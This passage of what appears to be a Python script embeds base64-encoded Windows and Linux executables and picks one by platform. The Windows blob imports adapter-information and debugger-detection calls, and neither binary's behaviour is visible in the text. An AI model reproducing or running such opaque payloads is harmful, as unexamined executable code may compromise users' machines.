dGRAQE1BRV9KWFoACgY/dWZsb3dAPyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBNQUVIWFoAADUGP3hzZ2V0bkA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQE1BRV9KUEFEX0pAWgA4Bj94c3B1dG5APyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBNQUVfSlBCRF9KQFoAjAU/c2V0YnVmQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBATUFFUEFWMTJAUEFEX0pAWgDnBT9zeW5jQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBATUFFSFhaACwEP2ltYnVlQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBATUFFWEFCVmxvY2FsZUAyQEBaAACaAT9fQkFET0ZGQHN0ZEBAM19KQgAAJgA/PzA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQElBRUBYWgAA7AM/Z2V0bG9jQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUJFP0FWbG9jYWxlQDJAWFoAAKgBP19GaW9wZW5Ac3RkQEBZQVBBVV9pb2J1ZkBAUEJESEhAWgAAeAA/PzE/JGJhc2ljX2lvc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAVUFFQFhaAFkCP19QbmluY0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQElBRVBBRFhaACkCP19Jb3NfYmFzZV9kdG9yQGlvc19iYXNlQHN0ZEBAQ0FYUEFWMTJAQFoAYAE/P183aW9zX2Jhc2VAc3RkQEA2QkAAPAE/P183PyRiYXNpY19pb3NARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEA2QkAAAHUAPz8xPyRiYXNpY19pb3NARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBVQUVAWFoAAAoAPz8wPyRiYXNpY19pb3N0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUBQQVY/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEAxQEBaAAAwBD9pbkA/JGNvZGVjdnRARERIQHN0ZEBAUUJFSEFBSFBCRDFBQVBCRFBBRDNBQVBBREBaAACRBT9zZXRnQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBASUFFWFBBRDAwQFoAABUGP3Vuc2hpZnRAPyRjb2RlY3Z0QERESEBzdGRAQFFCRUhBQUhQQUQxQUFQQURAWgAA5gQ/b3V0QD8kY29kZWN2dEBEREhAc3RkQEBRQkVIQUFIUEJEMUFBUEJEUEFEM0FBUEFEQFoA1gA/PzU/JGJhc2ljX2lzdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVBQVYwMUBBQUlAWgAAEQE/PzY/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVBQVYwMUBQNkFBQVZpb3NfYmFzZUAxQEFBVjIxQEBaQFoAAHsAPz8xPyRiYXNpY19pc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAVUFFQFhaAAARAD8/MD8kYmFzaWNfaXN0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUBQQVY/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEAxQF9OQFoAQgE/P183PyRiYXNpY19pc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBANkJAAABRBT9yZWFkQD8kYmFzaWNfaXN0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUFBVjEyQFBBRF9KQFoA7gU/dGVsbGdAPyRiYXNpY19pc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFP0FWPyRmcG9zQEhAMkBYWgB1BT9zZWVrZ0A/JGJhc2ljX2lzdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVBQVYxMkBfSkhAWgAATVNWQ1AxMDAuZGxsAAANAT93aGF0QGV4Y2VwdGlvbkBzdGRAQFVCRVBCRFhaAF0APz8xZXhjZXB0aW9uQHN0ZEBAVUFFQFhaAAAiAD8/MGV4Y2VwdGlvbkBzdGRAQFFBRUBBQlFCREBaACQAPz8wZXhjZXB0aW9uQHN0ZEBAUUFFQEFCVjAxQEBaAADRBW1lbW1vdmUAZgVhdG9pAABlAD8/M0BZQVhQQVhAWgAAYwA/PzJAWUFQQVhJQFoAAM8FbWVtY3B5AADNBW1lbWNocgAA0wVtZW1zZXQAABUAPz8wYmFkX2Nhc3RAc3RkQEBRQUVAUEJEQFoAADoBX19DeHhGcmFtZUhhbmRsZXIzAAAhAV9DeHhUaHJvd0V4Y2VwdGlvbgAAWQA/PzFiYWRfY2FzdEBzdGRAQFVBRUBYWgAUAD8/MGJhZF9jYXN0QHN0ZEBAUUFFQEFCVjAxQEBaAHoFZmdldGMAhQVmcHV0YwAfBnVuZ2V0YwAAJANfbG9ja19maWxlAACOBF91bmxvY2tfZmlsZQAAeQVmZmx1c2gAAOsFc2V0dmJ1ZgDQBW1lbWNweV9zAACWBWZ3cml0ZQAAewVmZ2V0cG9zAFkCX2ZzZWVraTY0AJIFZnNldHBvcwB2BWZjbG9zZQAAwANfbWtkaXIAAIsFZnJlZQAAxAVtYWxsb2MAAHoAPz9fVkBZQVhQQVhAWgDvBXNwcmludGYAZwVhdG9sAABNU1ZDUjEwMC5kbGwAAMUBX2Ftc2dfZXhpdAAAYwFfX2dldG1haW5hcmdzANwBX2NleGl0AAAqAl9leGl0AC0BX1hjcHRGaWx0ZXIAcwVleGl0AABkAV9faW5pdGVudgCwAl9pbml0dGVybQCxAl9pbml0dGVybV9lAOwBX2NvbmZpZ3RocmVhZGxvY2FsZQCiAV9fc2V0dXNlcm1hdGhlcnIAAOsBX2NvbW1vZGUAAEUCX2Ztb2RlAACfAV9fc2V0X2FwcF90eXBlAAACAT90ZXJtaW5hdGVAQFlBWFhaAI0EX3VubG9jawBbAV9fZGxsb25leGl0ACMDX2xvY2sAyQNfb25leGl0APsBX2NydF9kZWJ1Z2dlcl9ob29rAADuAD9fdHlwZV9pbmZvX2R0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XjtqO5M7mzumO6w7sju4O747xDvKO9A71jvcO+U7+zsqPEg8XjyUPLI85Dz1PAs9UT1ePWo9iT2SPbU9CD6OPrg+xT7OPu8+CD8RPyc/nD/bPwCAAAAwAAAACjBMMJ0w4zBgMawxBzIqMvAzOjRINF40ijTKNAo1MjVwNXo1hjUAAACQAADsAQAAKDIsMjgyPDJsMnAydDKIMowykDKUMpgynDKgMqQyqDKsMrAytDK4MrwywDLEMsgyzDLQMtQy2DLcMuAy5DLoMuwy8DL0Mvgy/DIAMwQzCDMMM0AzRDO0M7gzvDPAM6Q1qDUgNiQ2NDY4Njw2RDZcNmA2eDaINow2oDakNrQ2uDa8NsQ23DbsNvA2ADcENwg3DDcQNxQ3GDccNyA3JDcoNzA3SDdMN2Q3dDd4N3w3gDeEN4g3jDeQN5Q3mDegN7g3yDfMN9A31DfYN+A3+DcIOAw4EDgUOBw4NDg4OFA4YDhkOGg4cDiIOJg4nDikOLw4wDjYONw49Dj4OBA5IDkkOSg5LDkwOTg5UDlgOWQ5dDl4OXw5gDmEOYg5kDmoObg5vDnMOdA52DnwOQA6BDoUOhg6HDokOjw6TDpQOlg6cDoMOxQ7HDsoO0g7TDtUO2g7cDt8O5w7qDvIO9Q7/DsgPCw8NDxMPFg8eDyEPKg8yDzQPNg84DzoPPA8+DwAPRA9JD0wPTg9UD1YPWg9cD2IPZw9qD2wPcg92D3gPeg98D34PQA+CD4YPiA+KD4wPjw+XD5kPnA+mD6sPrg+wD7YPuA+6D74Pgg/ED8YPyA/LD9MP1g/eD+AP4w/rD+0P8A/5D8AAACgAAD4AAAABDAMMBQwHDAkMCwwNDA8MEQwTDBUMFwwZDBwMJQwtDC8MMQwzDDUMNww6DAMMSwxNDE8MUQxTDFUMVwxZDFsMXQxfDGEMYwxlDGcMaQxrDG0MbwxxDHMMdQx3DHkMewx9DH8MQQyDDIUMhwyJDIsMjQyPDJEMkwyVDJcMmQybDJ0MnwyhDKMMpQynDKkMqwytDK8MsQyzDLUMuAyFDMYMzQzODNYM3gzmDO0M7gzwDPUM9wz8DP4M/wzBDQMNBQ0IDRANEg0YDRwNIQ0kDSYNLA0uDTQNOA09DQANQg1SDVYNWw1gDWMNZQ1rDW4NQAAAMAAACgAAAAAMCAwcDCsMOgwODF0MbAx6DEEMiAyXDKYMtgy9DIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==')
return R
if a.__isLinux64():
R = at(
'f0VMRgIBAQMAAAAAAAAAAAIAPgABAAAA0B1AAAAAAABAAAAAAAAAAIiFAAAAAAAAAAAAAEAAOAAIAEAAHwAcAAYAAAAFAAAAQAAAAAAAAABAAEAAAAAAAEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAAwAAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAAAAAcAAAAAAAAABwAAAAAAAAAAQAAAAAAAAABAAAABQAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAANp+AAAAAAAA2n4AAAAAAAAAACAAAAAAAAEAAAAGAAAAAIAAAAAAAAAAgGAAAAAAAACAYAAAAAAATAQAAAAAAACIBQAAAAAAAAAAIAAAAAAAAgAAAAYAAAAwgAAAAAAAADCAYAAAAAAAMIBgAAAAAADAAQAAAAAAAMABAAAAAAAACAAAAAAAAAAEAAAABAAAABwCAAAAAAAAHAJAAAAAAAAcAkAAAAAAAEQAAAAAAAAARAAAAAAAAAAEAAAAAAAAAFDldGQEAAAAyG4AAAAAAADIbkAAAAAAAMhuQAAAAAAAvAEAAAAAAAC8AQAAAAAAAAQAAAAAAAAAUeV0ZAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAvbGliNjQvbGQtbGludXgteDg2LTY0LnNvLjIABAAAABAAAAABAAAAR05VAAAAAAACAAAABgAAABIAAAAEAAAAFAAAAAMAAABHTlUACHLYGcZ03nLqZ3wJJah7dklEA6gDAAAASAAAAAEAAAAGAAAAAAISACEBEAEAAAAASAAAAEoAAABQkgj5If30CShF1UwUmAxDeUlrtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgEAAASAAAAAAAAAAAAAAAAAAAAAAAAALADAAASAAAAAAAAAAAAAAAAAAAAAAAAAEIAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJcGAAASAAAAAAAAAAAAAAAAAAAAAAAAAMgFAAASAAAAAAAAAAAAAAAAAAAAAAAAAA4HAAASAAAAAAAAAAAAAAAAAAAAAAAAAKIDAAASAAAAAAAAAAAAAAAAAAAAAAAAABUHAAASAAAAAAAAAAAAAAAAAAAAAAAAAMQEAAASAAAAAAAAAAAAAAAAAAAAAAAAAB4HAAASAAAAAAAAAAAAAAAAAAAAAAAAACICAAASAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAgAAAAAAAAAAAAAAAAAAAAAAAAALEBAAASAAAAAAAAAAAAAAAAAAAAAAAAAMUDAAASAAAAAAAAAAAAAAAAAAAAAAAAALoFAAASAAAAAAAAAAAAAAAAAAAAAAAAAMUCAAASAAAAAAAAAAAAAAAAAAAAAAAAABoGAAASAAAAAAAAAAAAAAAAAAAAAAAAAEIHAAASAAAAAAAAAAAAAAAAAAAAAAAAAGEGAAASAAAAAAAAAAAAAAAAAAAAAAAAAMsAAAASAAAAAAAAAAAAAAAAAAAAAAAAAA0GAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEHAAASAAAAAAAAAAAAAAAAAAAAAAAAACUEAAASAAAAAAAAAAAAAAAAAAAAAAAAAN4FAAASAAAAAAAAAAAAAAAAAAAAAAAAAPIGAAASAAAAAAAAAAAAAAAAAAAAAAAAADQEAAASAAAAAAAAAAAAAAAAAAAAAAAAAG4CAAASAAAAAAAAAAAAAAAAAAAAAAAAAJMFAAASAAAAAAAAAAAAAAAAAAAAAAAAACsHAAASAAAAAAAAAAAAAAAAAAAAAAAAAOoGAAASAAAAAAAAAAAAAAAAAAAAAAAAAFQBAAASAAAAAAAAAAAAAAAAAAAAAAAAADYHAAASAAAAAAAAAAAAAAAAAAAAAAAAAJ0FAAASAAAAAAAAAAAAAAAAAAAAAAAAADIGAAASAAAAAAAAAAAAAAAAAAAAAAAAALAFAAASAAAAAAAAAAAAAAAAAAAAAAAAADEHAAASAAAAAAAAAAAAAAAAAAAAAAAAAPMBAAASAAAAAAAAAAAAAAAAAAAAAAAAANMCAAASAAAAAAAAAAAAAAAAAAAAAAAAAKEGAAASAAAAAAAAAAAAAAAAAAAAAAAAAMABAAASAAAAAAAAAAAAAAAAAAAAAAAAANwGAAASAAAAAAAAAAAAAAAAAAAAAAAAAGwEAAASAAAAAAAAAAAAAAAAAAAAAAAAADsHAAASAAAAAAAAAAAAAAAAAAAAAAAAAL4AAAASAAAAAAAAAAAAAAAAAAAAAAAAAOMGAAASAAAAAAAAAAAAAAAAAAAAAAAAAAYEAAASAAAAAAAAAAAAAAAAAAAAAAAAACQHAAASAAAAAAAAAAAAAAAAAAAAAAAAAEwFAAASAAAAAAAAAAAAAAAAAAAAAAAAADMAAAAgAAAAAAAAAAAAAAAAAAAAAAAAALQCAAASAAAAAAAAAAAAAAAAAAAAAAAAABcFAAASAAAAAAAAAAAAAAAAAAAAAAAAABIBAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEBAAASAAAAAAAAAAAAAAAAAAAAAAAAANUEAAASAAAAAAAAAAAAAAAAAAAAAAAAABUEAAASAAAAAAAAAAAAAAAAAAAAAAAAALoDAAASAAAAAAAAAAAAAAAAAAAAAAAAADYDAAASAAAAAAAAAAAAAAAAAAAAAAAAAIYAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJADAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAASAAAAAAAAAAAAAAAAAAAAAAAAAHYBAAASAAAAAAAAAAAAAAAAAAAAAAAAAMMGAAASAAAAAAAAAAAAAAAAAAAAAAAAACwCAAASAAAAAAAAAAAAAAAAAAAAAAAAABsDAAASAAAAAAAAAAAAAAAAAAAAAAAAAO4FAAASAAAAAAAAAAAAAAAAAAAAAAAAAHUAAAASAAAAAAAAAAAAAAAAAAAAAAAAAFMFAAASAAAAAAAAAAAAAAAAAAAAAAAAAEgDAAASAAAAAAAAAAAAAAAAAAAAAAAAAH8CAAASAAAAAAAAAAAAAAAAAAAAAAAAAPsGAAASAAAAAAAAAAAAAAAAAAAAAAAAADkCAAAiAA0ARWtAAAAAAABuAAAAAAAAAMsDAAASAAAA0BxAAAAAAAAAAAAAAAAAAOkAAAASAAAA0BpAAAAAAAAAAAAAAAAAANQFAAARABoAYIRgAAAAAAAQAQAAAAAAAGEBAAASAAAAIB1AAAAAAAAAAAAAAAAAAABsaWJzdGRjKysuc28uNgBfX2dtb25fc3RhcnRfXwBfSnZfUmVnaXN0ZXJDbGFzc2VzAHB0aHJlYWRfY2FuY2VsAF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTVjbG9zZUV2AF9aTktTczRmaW5kRVBLY20AX1pOU3QxOGJhc2ljX3N0cmluZ3N0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFU2FJY0VFRDFFdgBfWk5TYUljRUQxRXYAX1pOU2k1c2Vla2dFbFN0MTJfSW9zX1NlZWtkaXIAX1pOU3Q4aW9zX2Jhc2U0SW5pdEQxRXYAX1pOU29sc0VQRlJTb1NfRQBfWk5TdDE0YmFzaWNfaWZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVDMUVQS2NTdDEzX0lvc19PcGVubW9kZQBfWk5Tc3BMRVJLU3MAX19neHhfcGVyc29uYWxpdHlfdjAAX1pOS1N0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRTNzdHJFdgBfWk5LU3M1Y19zdHJFdgBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU1Y2xvc2VFdgBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVEMUV2AF9aTlNzcExFYwBfWk5Tc2FTRVJLU3MAX1pTdHBsSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVTYklUX1QwX1QxX0VSS1M2X1M4XwBfWk5TbzV3cml0ZUVQS2NsAF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTdpc19vcGVuRXYAX1pOU3M2YXBwZW5kRVBLYwBfWk5LU3M0c2l6ZUV2AF9aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlAF9aTlNvbHNFUEZSU3Q4aW9zX2Jhc2VTMF9FAF9fY3hhX2J